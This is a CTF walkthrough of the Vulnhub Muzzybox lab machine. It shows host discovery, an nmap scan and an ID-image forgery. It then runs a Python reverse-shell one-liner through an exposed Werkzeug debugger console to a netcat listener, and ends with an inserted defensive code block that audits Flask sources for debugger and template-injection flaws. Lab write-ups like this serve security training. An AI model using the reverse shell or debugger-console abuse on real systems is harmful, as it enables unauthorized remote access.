Vulnhub Muzzybox Target Machine: Detailed Testing Walkthrough

Muzzybox

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:ff:33:41      1      60  PCS Systemtechnik GmbH
 192.168.56.242  08:00:27:6c:2c:5b      1      60  PCS Systemtechnik GmbH

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.242.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.242 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-03 22:06 EDT
Nmap scan report for bogon (192.168.56.242)
Host is up (0.00015s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:3c:05:11:e0:2a:5a:34:bf:95:4c:59:0e:86:81:4f (RSA)
|   256 a7:65:d3:5b:e7:9d:56:ad:e4:a9:87:d9:2d:ae:3a:c3 (ECDSA)
|_  256 d5:7e:21:b6:3f:f3:24:7a:2f:b7:b6:6e:59:43:dd:73 (ED25519)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
3000/tcp  open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: Muzzy CTF
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
8989/tcp  open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: TypeError: The view function did not return a valid response. ...
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
9633/tcp  open  http    SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
15000/tcp open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: 404 Not Found
MAC Address: 08:00:27:6C:2C:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds

Challenge One

Visit port 80 to read the target machine's usage guide:

In addition, you can use this id card for reference. Click_Here OR go to http://{ip}:9633/idcard.png Note: Don't upload this file directly, edit with your name and upload its screenshot.

Download the image to the local Kali Linux machine:

http://192.168.56.242:9633/idcard.png

The image then needs to be edited with an image editing tool. Since the author's hint says only the principal is authorized, change "student" to "principal".

Then upload it at 192.168.56.242:3000.

Challenge Two

After the data breach University has developed the new website, but somehow it is still under maintenance. Can you list the current directory and read the flag file?
Link: http://{IP}:8989/

Visiting port 8989 returns an error page, but to the right of the error there is a clickable element that opens a popup window:

The PIN requested here is the number from Challenge One, 123456789; after entering it, a Python console appears.

First, start an nc listener on Kali Linux.

Then execute the following in the target's Python console:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.230",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

This gives us, on Kali Linux, the shell returned by the target:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.242] 58360
192.168.56.230 - - [04/Apr/2023 08:06:18] "GET /?__debugger__=yes&cmd=os.dup2(s.fileno()%2C2)&frm=140383158195424&s=8ywYwr8xuss2AXZJi1Os HTTP/1.1" 200 -
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
webpy@muzzy:~$ ls -alh
ls -alh
total 32K
drwx------ 4 webpy webpy 4.0K Feb 25  2020 .
drwxr-xr-x 7 root  root  4.0K Feb 25  2020 ..
-rwx------ 1 webpy webpy  381 Feb 25  2020 .bash_history
-rwx------ 1 webpy webpy 3.7K Feb 25  2020 .bashrc
drwx------ 2 webpy webpy 4.0K Feb 25  2020 flag
drwx------ 3 webpy webpy 4.0K Feb 25  2020 .local
-rwx------ 1 webpy webpy  807 Feb 25  2020 .profile
-rwx------ 1 webpy webpy   66 Feb 25  2020 .selected_editor
webpy@muzzy:~$ cd flag
cd flag
webpy@muzzy:~/flag$ ls -alh
ls -alh
total 12K
drwx------ 2 webpy webpy 4.0K Feb 25  2020 .
drwx------ 4 webpy webpy 4.0K Feb 25  2020 ..
-rwx------ 1 webpy webpy  490 Feb 25  2020 ctf2.py
webpy@muzzy:~/flag$ cat ctf2.py
cat ctf2.py
import os
from flask import Flask
app = Flask(__name__)
@app.route('/')
def aws_console():
        print("Welcome to the Muzzy's World")
if __name__ == '__main__':
    # os.environ['WERKZEUG_DEBUG_PIN'] = 'off'
    # os.environ.set('WERKZEUG_DEBUG_PIN') = 'Muzzy'
    # app.secret_key = '123-456-789'
    os.environ['WERKZEUG_DEBUG_PIN'] = '123-456-789'
    app.config['FLAG'] = 'N$cTF{R34D_F!L3_/home/webssti/noflag.txt}'
    app.run(host='0.0.0.0', port=8989, debug=True, threaded=True)

This yields the second flag:

N$cTF{R34D_F!L3_/home/webssti/noflag.txt}

Challenge Three

http://192.168.56.242:15000/page?name=jason

When we submit different values for name, the page echoes the submitted value back in its content, so this port has a template injection vulnerability.

The tplmap tool can be used for this.
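As an added example (not code from the original post or from the Muzzybox VM), the following static audit flags the three Flask/Werkzeug pitfalls this walkthrough turns on: app.run(debug=True) exposing the Werkzeug debugger console (Challenge Two), a WERKZEUG_DEBUG_PIN hardcoded in source, and a template string built from user input, the pattern behind the SSTI in Challenge Three. The Challenge Three app's source is not on the page, so SSTI_SRC is a constructed stand-in, and the hardened SAFE_SRC is likewise my own.

```python
import ast
# Challenge Two's ctf2.py, trimmed to the lines the audit cares about (quoted from the page).
CTF2_SRC = """
app = Flask(__name__)
if __name__ == '__main__':
    os.environ['WERKZEUG_DEBUG_PIN'] = '123-456-789'
    app.run(host='0.0.0.0', port=8989, debug=True, threaded=True)
"""
# Constructed stand-in for the Challenge Three app (its source is not on the page):
# the user-supplied name is spliced into the template text itself.
SSTI_SRC = """
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/page')
def page():
    return render_template_string('Hello ' + request.args.get('name', ''))
"""
# Hardened form: literal template, name passed as a context variable, debugger off.
SAFE_SRC = """
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/page')
def page():
    return render_template_string('Hello {{ name }}', name=request.args.get('name', ''))
app.run(host='127.0.0.1', port=8989)
"""

def _callee(node):
    """Dotted name of a call target, e.g. 'app.run' or 'render_template_string'."""
    if isinstance(node, ast.Attribute):
        return _callee(node.value) + '.' + node.attr
    return node.id if isinstance(node, ast.Name) else ''

def audit_flask_source(src):
    """Return (line, issue) pairs for the three pitfalls this walkthrough turns on."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _callee(node.func)
            if name.endswith('.run') and any(
                    kw.arg == 'debug' and getattr(kw.value, 'value', None) is True for kw in node.keywords):
                findings.append((node.lineno, 'debug=True: Werkzeug debugger console reachable'))
            elif name.endswith('render_template_string') and node.args and not isinstance(node.args[0], ast.Constant):
                findings.append((node.lineno, 'template text built from a non-literal: possible SSTI'))
        elif isinstance(node, ast.Assign) and any(
                isinstance(n, ast.Constant) and n.value == 'WERKZEUG_DEBUG_PIN'
                for t in node.targets for n in ast.walk(t)):
            findings.append((node.lineno, 'WERKZEUG_DEBUG_PIN hardcoded in source'))
    return findings
```

Line numbers in the findings refer to the audited source string, whose first line is empty, so ctf2.py's PIN assignment reports as line 4 and its app.run as line 5.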


posted @ 2023-04-04 11:18  Jason_huawen